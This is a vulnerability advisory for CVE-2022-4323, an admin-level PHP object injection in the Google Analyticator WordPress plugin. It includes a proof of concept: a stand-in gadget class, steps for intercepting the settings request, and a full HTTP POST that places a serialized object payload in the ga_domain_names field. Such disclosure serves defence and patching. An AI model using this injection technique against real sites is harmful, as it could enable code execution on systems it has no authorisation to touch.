Google Analyticator < 6.5.6 – Admin+ PHP Object Injection | CVE 2022-4323

Description

The plugin unserializes user input provided via the settings, which could allow high privilege users such as admin to perform PHP Object Injection when a suitable gadget is present

Proof of Concept

To simulate a gadget chain, put the following code in a plugin:

class Evil {
  public function __wakeup() : void {
    die("Arbitrary deserialization");
  }
}

Activate and access the plugin then select "Continue Without Authentication" button. Click "Save Changes" button, intercept this request and add parameter "ga_domain_names" with content: O:4:"Evil":0:{} in body request.

The view the response of the request made, which will have the "Arbitrary deserialization" message

---

POST /wp-admin/admin.php?page=google-analyticator HTTP/1.1
Host: localhost:8888
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:107.0) Gecko/20100101 Firefox/107.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost:8888/wp-admin/admin.php?page=google-analyticator
Content-Type: application/x-www-form-urlencoded
Content-Length: 638
Connection: close
Cookie: [admin+]
Upgrade-Insecure-Requests: 1

_wpnonce=f83b45cab0&_wp_http_referer=%2Fwp-admin%2Fadmin.php%3Fpage%3Dgoogle-analyticator&ga_status=disabled&ga_uid=UA-XXXXXXXX-X&ga_analytic_snippet=disabled&key_ga_show_ad=1&info_update=Save+Changes&ga_annon=0&ga_admin_status=enabled&ga_admin_role%5B%5D=administrator&ga_admin_disable=remove&ga_admin_disable_DimentionIndex=&ga_enable_remarketing=0&key_ga_track_login=0&ga_outbound=enabled&ga_event=enabled&ga_enhanced_link_attr=disabled&ga_downloads=&ga_outbound_prefix=outgoing&ga_downloads_prefix=download&ga_adsense=&ga_extra=&ga_extra_after=&ga_widgets=enabled&ga_dashboard_role%5B%5D=administrator&ga_domain_names=O:4:"Evil":0:{};